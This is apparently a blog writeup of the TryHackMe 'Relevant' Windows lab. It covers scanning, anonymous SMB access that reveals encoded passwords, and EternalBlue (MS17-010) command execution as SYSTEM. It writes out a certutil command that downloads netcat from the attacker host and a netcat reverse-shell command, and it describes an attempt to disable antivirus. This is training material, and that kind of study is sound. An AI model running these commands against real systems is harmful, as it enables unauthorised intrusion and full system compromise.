
Daniel Cano Merchán - Hacking & Tech

Writeup Tryhackme Relevant

Writeup about the TryHackMe Windows machine Relevant. This is one of the two penetration testing challenges on the Offensive Pentesting path.

I rooted the machine in two ways: the intended one, and one using EternalBlue.

0 - Basic info

Windows machine

1 - Reconnaissance and enumeration

Nmap scan:

sudo nmap -sS -sC -sV -O -p- -oN scan.txt --script vuln 10.10.😄 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-21 18:05 CEST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 3.20% done; ETC: 18:10 (0:04:02 remaining)
Nmap scan report for 10.10.😄
Host is up (0.052s latency).
Not shown: 65527 filtered ports
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
/tcp  open  ssl/ms-wbt-server?
|_sslv2-drown: 
49663/tcp open  http               Microsoft IIS httpd 10.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49666/tcp open  msrpc              Microsoft Windows RPC
49668/tcp open  msrpc              Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2016 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2016 (90%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 701.09 seconds

Open ports: 80, 135, 139, 445, an ssl/ms-wbt-server (RDP) port, 49663, 49666 and 49668. Nmap also reports the host as vulnerable to EternalBlue (MS17-010, CVE-2017-0143), so sooner or later I am going to check that. Keep in mind that the smb-vuln-ms17-010 script only probes for the bug; it does not exploit it.
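As an added example (not code from the original writeup), here is a small Python triage helper for nmap's normal output, the format scan.txt above is saved in: it lists the open ports with their service/version strings and every NSE script block nmap marked VULNERABLE, together with the CVE IDs attached to it. The sample scan in the block is a constructed, trimmed copy of the one above against a placeholder address; the RDP line, whose port number is missing in this copy of the scan, is left out. For anything beyond a one-off, nmap's XML output (-oX) is the better input for tooling.

```python
"""Triage helper for nmap normal (-oN) output such as scan.txt above.

Added example, not part of the original writeup. It extracts the open
ports with their service/version strings and every NSE script block that
nmap marked VULNERABLE, together with the CVE IDs attached to it.
SAMPLE_SCAN is a constructed, trimmed copy of this page's scan against a
placeholder address (192.0.2.10).
"""
import re

SAMPLE_SCAN = """\
Nmap scan report for 192.0.2.10
Host is up (0.052s latency).
Not shown: 65528 filtered ports
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
49663/tcp open  http               Microsoft IIS httpd 10.0
49666/tcp open  msrpc              Microsoft Windows RPC
49668/tcp open  msrpc              Microsoft Windows RPC

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 701.09 seconds
"""

# "80/tcp    open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# "| smb-vuln-ms17-010:" or "|_http-csrf: Couldn't ..." opens a script block;
# body lines are indented further ("|   VULNERABLE:") and do not match.
SCRIPT_HEADER = re.compile(r"^\|[_ ]([\w.-]+):\s*(.*)$")
STATE = re.compile(r"State:\s+((?:LIKELY\s+)?VULNERABLE)")
CVE = re.compile(r"CVE-\d{4}-\d{4,}")


def open_ports(text):
    """Return [{'port', 'proto', 'service', 'version'}] for every open port line."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group(3) == "open":
            ports.append({
                "port": int(m.group(1)),
                "proto": m.group(2),
                "service": m.group(4),
                "version": m.group(5).strip(),
            })
    return ports


def script_blocks(text):
    """Group NSE output into (script_name, [body_lines]) pairs.

    A block starts at a header line and continues while lines keep the
    leading '|'; the first line without it (a port line, a blank) ends it.
    """
    blocks, name, body = [], None, []
    for line in text.splitlines():
        m = SCRIPT_HEADER.match(line)
        if m:
            if name is not None:
                blocks.append((name, body))
            name, body = m.group(1), [m.group(2)]
        elif line.startswith("|") and name is not None:
            body.append(line[1:].strip())
        elif name is not None:
            blocks.append((name, body))
            name, body = None, []
    if name is not None:
        blocks.append((name, body))
    return blocks


def vulnerable_findings(text):
    """Return {script_name: {'state': ..., 'cves': [...]}} for flagged blocks.

    Only blocks carrying a 'State: VULNERABLE' (or LIKELY VULNERABLE) line
    count, so '|_smb-vuln-ms10-054: false' and script errors are ignored.
    CVE IDs are de-duplicated because nmap repeats them in reference URLs.
    """
    findings = {}
    for name, body in script_blocks(text):
        joined = "\n".join(body)
        state = STATE.search(joined)
        if not state:
            continue
        cves = []
        for cve in CVE.findall(joined):
            if cve not in cves:
                cves.append(cve)
        findings[name] = {"state": state.group(1), "cves": cves}
    return findings


if __name__ == "__main__":
    for p in open_ports(SAMPLE_SCAN):
        print(f"{p['port']}/{p['proto']:<4} {p['service']:<18} {p['version']}")
    for name, f in vulnerable_findings(SAMPLE_SCAN).items():
        print(f"{name}: {f['state']} {', '.join(f['cves'])}")
```

On the scan above this prints the seven ports plus one finding, smb-vuln-ms17-010 with CVE-2017-0143. The "Not shown: N filtered ports" line is a quick sanity check on the port count: 65535 minus N should equal the number of port lines you parsed.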

Enumerating port 80:


gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.😄
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.😄
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/06/21 18:06:04 Starting gobuster in directory enumeration mode
===============================================================
/*checkout*           (Status: 400) [Size: 3420]
/*docroot*            (Status: 400) [Size: 3420]
/*                    (Status: 400) [Size: 3420]
/http%3A%2F%2Fwww     (Status: 400) [Size: 3420]
/http%3A              (Status: 400) [Size: 3420]
/q%26a                (Status: 400) [Size: 3420]
/**http%3a            (Status: 400) [Size: 3420]
/*http%3A             (Status: 400) [Size: 3420]
Progress: 42833 / 220561 (19.42%)
[ERROR] 2021/06/21 18:09:34 [!] Get "http://10.10.😄/38055": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/06/21 18:09:34 [!] Get "http://10.10.😄/ewk": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/06/21 18:09:34 [!] Get "http://10.10.😄/002024": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/06/21 18:09:34 [!] Get "http://10.10.😄/scottrade": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/06/21 18:09:34 [!] Get "http://10.10.😄/partner_logos": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/06/21 18:09:34 [!] Get "http://10.10.😄/fnews": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/06/21 18:09:34 [!] Get "http://10.10.😄/18631": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/06/21 18:09:34 [!] Get "http://10.10.😄/001858": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/06/21 18:09:34 [!] Get "http://10.10.😄/Security-HOWTO": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/06/21 18:09:34 [!] Get "http://10.10.😄/002030": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/**http%3A            (Status: 400) [Size: 3420]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 3420]
/http%3A%2F%2Fblogs   (Status: 400) [Size: 3420]
/http%3A%2F%2Fblog    (Status: 400) [Size: 3420]
/**http%3A%2F%2Fwww   (Status: 400) [Size: 3420]
/s%26p                (Status: 400) [Size: 3420]
/%3FRID%3D2671        (Status: 400) [Size: 3420]
/devinmoore*          (Status: 400) [Size: 3420]
/200109*              (Status: 400) [Size: 3420]
/*sa_                 (Status: 400) [Size: 3420]
/*dc_                 (Status: 400) [Size: 3420]
/http%3A%2F%2Fcommunity (Status: 400) [Size: 3420]
/Chamillionaire%20%26%20Paul%20Wall-%20Get%20Ya%20Mind%20Correct (Status: 400) [Size: 3420]
/Clinton%20Sparks%20%26%20Diddy%20-%20Dont%20Call%20It%20A%20Comeback%28RuZtY%29 (Status: 400) [Size: 3420]
/DJ%20Haze%20%26%20The%20Game%20-%20New%20Blood%20Series%20Pt (Status: 400) [Size: 3420]                   
/http%3A%2F%2Fradar   (Status: 400) [Size: 3420]                                                           
/q%26a2               (Status: 400) [Size: 3420]                                                           
/login%3f             (Status: 400) [Size: 3420]                                                           
/Shakira%20Oral%20Fixation%201%20%26%202 (Status: 400) [Size: 3420]                                        
/http%3A%2F%2Fjeremiahgrossman (Status: 400) [Size: 3420]                                                  
/http%3A%2F%2Fweblog  (Status: 400) [Size: 3420]                                                           
/http%3A%2F%2Fswik    (Status: 400) [Size: 3420]                                                           
                                                                                                           
===============================================================
2021/06/21 18:47:06 Finished
===============================================================

On port 80 the only hits are 400 responses of identical size for wordlist entries containing characters IIS rejects, so nothing useful there. I also enumerated port 49663 with the same wordlist and got the same results, except for one extra path: /nt4wrksv.

Enumerating shares

smbclient --no-pass -L //10.10.😄

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	nt4wrksv        Disk      
SMB1 disabled -- no workgroup available

Testing anonymous login to the nt4wrksv share:

smbclient --no-pass //10.10.😄/nt4wrksv
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 25 23:46:04 2020
  ..                                  D        0  Sat Jul 25 23:46:04 2020
  passwords.txt                       A       98  Sat Jul 25 17:15:33 2020

		7735807 blocks of size 4096. 5139864 blocks available
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0,2 KiloBytes/sec) (average 0,2 KiloBytes/sec)

It worked: the share contains a passwords.txt file holding base64-encoded user/password pairs:

cat passwords.txt
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk 

echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 --decode
Bob - !P@$$W0rD!123

echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 --decode
Bill - Juw4nnaM4n420696969!$$$ 
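The decoding above is two echo | base64 --decode calls. As an added example, not from the original writeup, here is a Python parser for that file layout (a bracketed header, then one base64 line per account decoding to 'Name - password'). The sample input is constructed: the two real lines from the share plus two made-up accounts (Alice and Eve, with made-up passwords), written with the quirks a file pulled from a Windows share usually carries (CRLF line endings, trailing whitespace, stripped '=' padding), because those are what make a copy-pasted line fail with "invalid input".

```python
"""Parser for the credentials file layout found in the nt4wrksv share:
a bracketed header line, then one base64 line per account, each decoding
to 'Name - password'.

Added example, not from the original writeup. SAMPLE_FILE is constructed:
the two real lines from the share plus two made-up accounts, written with
the quirks a file copied off a Windows share usually has (CRLF line
endings, trailing whitespace, a line whose '=' padding was stripped).
"""
import base64
import binascii
import re

SAMPLE_FILE = (
    "[User Passwords - Encoded]\r\n"
    "Qm9iIC0gIVBAJCRXMHJEITEyMw==\r\n"
    "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk \r\n"   # trailing space, as in the share copy
    "QWxpY2UgLSBodW50ZXIy\r\n"                         # made-up account: 'Alice - hunter2'
    "RXZlIC0gczNjcmV0IQ\r\n"                           # made-up, padding stripped: 'Eve - s3cret!'
    "\r\n"
)

# 'Name - password'; the name is everything before the first ' - '.
ENTRY = re.compile(r"^(?P<user>.+?) - (?P<password>.+)$")


def decode_line(line):
    """Base64-decode one line, tolerating embedded whitespace and stripped
    '=' padding. Returns None when the line is not base64 or not UTF-8 text."""
    s = re.sub(r"\s+", "", line)
    if not s:
        return None
    s += "=" * (-len(s) % 4)          # restore padding to a multiple of 4
    try:
        return base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def parse_credentials(text):
    """Return {user: password}; skips the header, blank lines and anything
    that does not decode to the 'Name - password' shape."""
    creds = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("["):
            continue
        decoded = decode_line(line)
        if decoded is None:
            continue
        m = ENTRY.match(decoded)
        if m:
            creds[m.group("user")] = m.group("password")
    return creds


if __name__ == "__main__":
    for user, password in parse_credentials(SAMPLE_FILE).items():
        print(f"{user}: {password}")
```

The decode itself is the same as the shell one-liners; the point is the tolerance for CRLF, stray whitespace and missing padding, and that a line which is not base64 at all is skipped instead of aborting the run.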

I tried rdesktop and xfreerdp with both sets of credentials, but both failed. Looking at the xfreerdp traces I got some interesting error messages:

With Bill:

[19:17:56:153] [78876:78877] [ERROR][com.freerdp.core] - transport_ssl_cb:freerdp_set_last_error_ex ERRCONNECT_PASSWORD_CERTAINLY_EXPIRED [0x0002000F]
[19:17:56:153] [78876:78877] [ERROR][com.freerdp.core.transport] - BIO_read returned an error: error:14094438:SSL routines:ssl3_read_bytes:tlsv1 alert internal error

With Bob

[19:20:41:008] [78936:78937] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[19:20:41:008] [78936:78937] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[19:20:41:008] [78936:78937] [ERROR][com.freerdp.core] - freerdp_post_connect failed

So are Bill's credentials expired?

2 - Vulnerability Identification

With the new credentials in hand I tested different EternalBlue modules in Metasploit, but only auxiliary/admin/smb/ms17_010_command worked for me:

Module options (auxiliary/admin/smb/ms17_010_command):

   Name                  Current Setting                                 Required  Description
   ----                  ---------------                                 --------  -----------
   COMMAND               whoami                                          yes       The command you want to execute on the remote host
   DBGTRACE              false                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                             no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists  yes       List of named pipes to check
                         /named_pipes.txt
   RHOSTS                10.10.😄                                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445                                             yes       The Target port (TCP)
   SERVICE_DESCRIPTION                                                   no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                  no        The service display name
   SERVICE_NAME                                                          no        The service name
   SMBDomain             .                                               no        The Windows domain to use for authentication
   SMBPass               !P@$$W0rD!123                                   no        The password for the specified username
   SMBSHARE              C$                                              yes       The name of a writeable share on the server
   SMBUser               Bob                                             no        The username to authenticate as
   THREADS               1                                               yes       The number of concurrent threads (max one per host)
   WINPATH               WINDOWS                                         yes       The name of the remote Windows directory

Running the exploit:

msf6 auxiliary(admin/smb/ms17_010_command) > exploit

[*] 10.10.😄:445     - Authenticating to 10.10.😄 as user 'Bob'...
[*] 10.10.😄:445     - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 10.10.😄:445     - Built a write-what-where primitive...
[+] 10.10.😄:445     - Overwrite complete... SYSTEM session obtained!
[+] 10.10.😄:445     - Service start timed out, OK if running a command or non-service executable...
[*] 10.10.😄:445     - Getting the command output...
[*] 10.10.😄:445     - Executing cleanup...
[+] 10.10.😄:445     - Cleanup was successful
[+] 10.10.😄:445     - Command completed successfully!
[*] 10.10.😄:445     - Output for "whoami":

nt authority\system


[*] 10.10.😄:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Great: commands run as NT AUTHORITY\SYSTEM, so I have half of an EternalBlue exploit (command execution, but no shell yet).

3 - Exploit

With that SYSTEM-level command execution I tried different payloads, but none of them worked. Later I discovered why: the machine has an AV running.

msf6 auxiliary(admin/smb/ms17_010_command) > exploit

[*] 10.10.😄:445     - Authenticating to 10.10.😄 as user 'Bob'...
[*] 10.10.😄:445     - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 10.10.😄:445     - Built a write-what-where primitive...
[+] 10.10.😄:445     - Overwrite complete... SYSTEM session obtained!
[+] 10.10.😄:445     - Service start timed out, OK if running a command or non-service executable...
[*] 10.10.😄:445     - Getting the command output...
[*] 10.10.😄:445     - Executing cleanup...
[+] 10.10.😄:445     - Cleanup was successful
[+] 10.10.😄:445     - Command completed successfully!
[*] 10.10.😄:445     - Output for "sc query WinDefend":


SERVICE_NAME: WinDefend 
        TYPE               : 10  WIN32_OWN_PROCESS  
        STATE              : 4  RUNNING 
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Disabling the AV was not possible: sc returned [SC] OpenService FAILED 5: Access is denied. Even as SYSTEM, the Defender service is protected and cannot be stopped through the service control manager.

The strategy was then to upload a precompiled netcat for Windows (nc64.exe) and use it to establish a reverse shell to my machine.

First, set up a Python HTTP server in the directory holding the precompiled nc64.exe:

python3 -m http.server 80

To pull nc64.exe down to the Windows machine I used certutil, saving it as C:\Windows\Temp\nc64.exe because that directory is normally writable and allows execution:

msf6 auxiliary(admin/smb/ms17_010_command) > set COMMAND 'certutil -urlcache -split -f "http://10.9.😄:80/nc64.exe" C:\Windows\Temp\nc64.exe'
COMMAND => certutil -urlcache -split -f "http://10.9.😄:80/nc64.exe" C:\Windows\Temp\nc64.exe
msf6 auxiliary(admin/smb/ms17_010_command) > exploit

[*] 10.10.😄:445     - Authenticating to 10.10.😄 as user 'Bob'...
[*] 10.10.😄:445     - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 10.10.😄:445     - Built a write-what-where primitive...
[+] 10.10.😄:445     - Overwrite complete... SYSTEM session obtained!
[+] 10.10.😄:445     - Service start timed out, OK if running a command or non-service executable...
[*] 10.10.😄:445     - Getting the command output...
[*] 10.10.😄:445     - Executing cleanup...
[+] 10.10.😄:445     - Cleanup was successful
[+] 10.10.😄:445     - Command completed successfully!
[*] 10.10.😄:445     - Output for "certutil -urlcache -split -f "http://10.9.😄:80/nc64.exe" C:\Windows\Temp\nc64.exe":

****  Online  ****
  0000  ...
  b0d8
CertUtil: -URLCache command completed successfully.


[*] 10.10.😄:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

With nc on the Windows machine, the next step was to set up a nc listener on port 4243 on my side and trigger the executable through EternalBlue to get a reverse shell. Before doing that it is worth confirming the file is still in C:\Windows\Temp, since Defender can quarantine a dropped binary silently. The STATUS_SHARING_VIOLATION in the run below is expected: the module collects command output through a file on the share, and nc keeps that output redirect open for as long as the shell is alive, so the module cannot read it back. The shell still arrives on the listener.

msf6 auxiliary(admin/smb/ms17_010_command) > set COMMAND 'C:\Windows\Temp\nc64.exe 10.9.😄 4243 -e cmd.exe'
COMMAND => C:\Windows\Temp\nc64.exe 10.9.😄 4243 -e cmd.exe
msf6 auxiliary(admin/smb/ms17_010_command) > exploit

[*] 10.10.😄:445     - Authenticating to 10.10.😄 as user 'Bob'...
[*] 10.10.😄:445     - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 10.10.😄:445     - Built a write-what-where primitive...
[+] 10.10.😄:445     - Overwrite complete... SYSTEM session obtained!
[+] 10.10.😄:445     - Service start timed out, OK if running a command or non-service executable...
[-] 10.10.😄:445     - Unable to get handle: The server responded with error: STATUS_SHARING_VIOLATION (Command=45 WordCount=0)
[-] 10.10.😄:445     - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 10.10.😄:445     - Getting the command output...
[*] 10.10.😄:445     - Command finished with no output
[*] 10.10.😄:445     - Executing cleanup...
[+] 10.10.😄:445     - Cleanup was successful
[+] 10.10.😄:445     - Command completed successfully!
[*] 10.10.😄:445     - Output for "C:\Windows\Temp\nc64.exe 10.9.😄 4243 -e cmd.exe":



[*] 10.10.😄:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Flags:

C:\Users\Bob\Desktop>type user.txt
type user.txt
THM{fdk4😄}

C:\Users\Administrator\Desktop>type root.txt
type root.txt
THM{1fk5😄}

4 - Post-Exploitation and privilege escalation

Because the ms17_010_command module already runs as SYSTEM, no privilege escalation is needed.

The intended way is to upload files to the nt4wrksv share, which is also served as a web directory by the second IIS instance on port 49663: drop an .aspx reverse shell into the share, trigger it by browsing to its URL on port 49663, and then escalate to SYSTEM with PrintSpoofer (which abuses SeImpersonatePrivilege). I was lazy today and I don't want to write up the intended way too :P


Thanks for reading!